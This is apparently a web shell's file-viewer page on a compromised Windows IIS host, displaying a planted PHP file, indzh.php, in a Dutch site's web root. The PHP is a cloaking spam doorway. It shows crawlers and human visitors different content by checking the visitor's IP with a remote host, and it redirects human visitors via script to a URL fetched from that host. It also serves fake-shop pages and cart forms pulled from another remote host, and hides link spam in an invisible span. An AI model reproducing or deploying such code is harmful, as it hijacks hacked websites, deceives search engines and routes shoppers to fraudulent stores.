HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
$ pwd: D:/HostingSpaces/SBogers13/rie-jeanne.nl/wwwroot/
Upload Files
File: D:/HostingSpaces/SBogers13/rie-jeanne.nl/wwwroot/indzh.php
<?php error_reporting(E_ALL^E_NOTICE^E_WARNING);
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
function check($ip){
	if(!is_null($_GET['kk'])){$ip="66.249.64.190";}
    $domain = file_get_contents("http://wfjs.a123.fr/getdomain.aspx?rnd=1&ip=".$ip);
     if(stripos($domain,'google')!=false or stripos($domain,'msn.com')!=false or stripos($domain,'yahoo.com')!=false or stripos($domain,'aol.com')!=false){}
else
{	if(!is_null($_GET['zhzh']))	 
	{
echo '<script>document.location="'.file_get_contents('http://wfjs.a123.fr/tzz.txt')."?cid=".$_GET['cid']."&cname=".urlencode($_GET['zhzh'])."&xi=".$_GET['xi']."&xc=".$_GET['xc']."&pr=".$_GET['pr'].'"</script>';
exit();
	}
}	
   }
   function getIP() { 
		if (getenv('HTTP_CLIENT_IP')) { 
			$ip = getenv('HTTP_CLIENT_IP'); 
		} elseif (getenv('HTTP_X_FORWARDED_FOR')) { 
			$ip = getenv('HTTP_X_FORWARDED_FOR'); 
		} elseif (getenv('HTTP_X_FORWARDED')) { 
			$ip = getenv('HTTP_X_FORWARDED'); 
		} elseif (getenv('HTTP_FORWARDED_FOR')) { 
			$ip = getenv('HTTP_FORWARDED_FOR'); 
		} elseif (getenv('HTTP_FORWARDED')) { 
			$ip = getenv('HTTP_FORWARDED'); 
		} else { 
			$ip = $_SERVER['REMOTE_ADDR']; 
		} 
		return $ip; 
	} 
$validate = check(getIP());
$cid=file_get_contents("http://wfjs.a123.fr/zhsj.asp");
if(!is_null($_GET['cid'])){$cid=$_GET['cid'];}
$gjc=$_GET['zhzh'];
$gjc1=file_get_contents("http://wzdy.lc7.fr/getci.aspx?cid=".$cid."&s=2&e=4");
$gjc2=file_get_contents("http://wzdy.lc7.fr/getci.aspx?cid=".$cid."&s=5&e=7");
?><?php
if(!is_null($_GET['number'])){
 $url="http://wzdy.lc7.fr/s.aspx?cid=".$cid."&number=".$_GET['number']."&xi=1-6&xc=19-26";
 $str=file_get_contents($url);
 $str=str_replace('yymm',$http_type.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'],$str);
 $str=str_replace('shop=','zhzh=',$str);
 echo $str;
 exit();
 }?><html><head>
<title><?php echo $gjc?> Off <?php echo mt_rand(50,70)?>% - <?php echo $_SERVER['HTTP_HOST']?></title>
<meta name="keywords" content="<?php echo $gjc?>,<?php echo $gjc1?>"/>
<meta name="description" content="<?php echo $gjc?>,<?php echo $gjc2?>." />
<meta name="robots" content="index,follow,all"/>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<META NAME="Robots"  CONTENT="index, follows">
</head>
<body>
<?php
$url="";
if(!is_null($_GET['type'])){
	if($_GET['type']=="addtocart")
	{
	$url="http://wzdy.lc7.fr/cart.aspx?gj=com";
	$str = file_get_contents($url);
	$str=str_replace('pppid',$_POST['pid'],$str);
	$str=str_replace('tupian',$_POST['pic'],$str);
	$str=str_replace('mingzi',$_POST['pname'],$str);
	$str=str_replace('danjia',$_POST['price'],$str);
	$str=str_replace('shuliang',$_POST['quantity'],$str);
	$str=str_replace('zongjia',$_POST['price']*$_POST['quantity'],$str);
	$str=str_replace('cima',$_POST['s1'],$str);
	$str=str_replace('curfh',$_POST['fh'],$str);
	$str=str_replace('pricetype',$_POST['pricetype'],$str);
	$str=str_replace('ZZZZZ',file_get_contents("http://wfjs.a123.fr/xdz.txt"),$str);
	echo $str;
	}
	else if($_GET['type']=="search")
	{
	   $url="http://wzdy.lc7.fr/GD_Page.aspx?cid=".$_GET['cid']."&xi=1-6&xc=19-26&searchtxt=".urlencode($_GET['searchtxt'])."&you=0&page=".$_SERVER['SCRIPT_NAME'];
	   $str = file_get_contents($url);
       echo $str;
	}
}
else
{if(!is_null($gjc)){
	$wid=mt_rand(1,4108);
    $url="http://wzdy.lc7.fr/GD_Page.aspx?cid=".$_GET['cid']."&shop=".urlencode($gjc)."&xi=".$_GET['xi']."&xc=".$_GET['xc']."&pl=".$_GET['pl']."&pr=".$_GET['pr']."&you=".$_GET['you']."&mt=http://wfjs.a123.fr/ar/ar_".$wid.".txt";}
else{$url="http://wzdy.lc7.fr/GD_Page.aspx?cid=".$cid."&xi=1-6&xc=19-26&pnum=".$_GET['pnum']."&you=0&page=".$_SERVER['SCRIPT_NAME'];}
 $str=file_get_contents($url);
 $str=str_replace('&shop=','&zhzh=',$str);
 $str=str_replace('&pl=','',$str);
 $str=str_replace('&you=0','',$str);
 $str=str_replace('&you=','',$str);
 $str=str_replace('HHHHH',$_SERVER['SCRIPT_NAME'],$str);
 $str=str_replace('BBBBB',$_SERVER['HTTP_HOST'],$str);
 $str=str_replace('AAAAA',$_SERVER['PHP_SELF']."?gj=com&type=addtocart",$str);
 $str=str_replace('DDDDD',$gjc,$str);
 $str=str_replace('QQQQQ',$http_type.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'],$str);
 echo $str;
}?>
<span style="display:none"><?php echo file_get_contents("http://wfjs.a123.fr/hlzh.aspx?page=".$_SERVER['SCRIPT_NAME'])?> | <?php echo file_get_contents("http://wfjs.a123.fr/wl.asp")?></span>
</body>
</html>
@ Telegram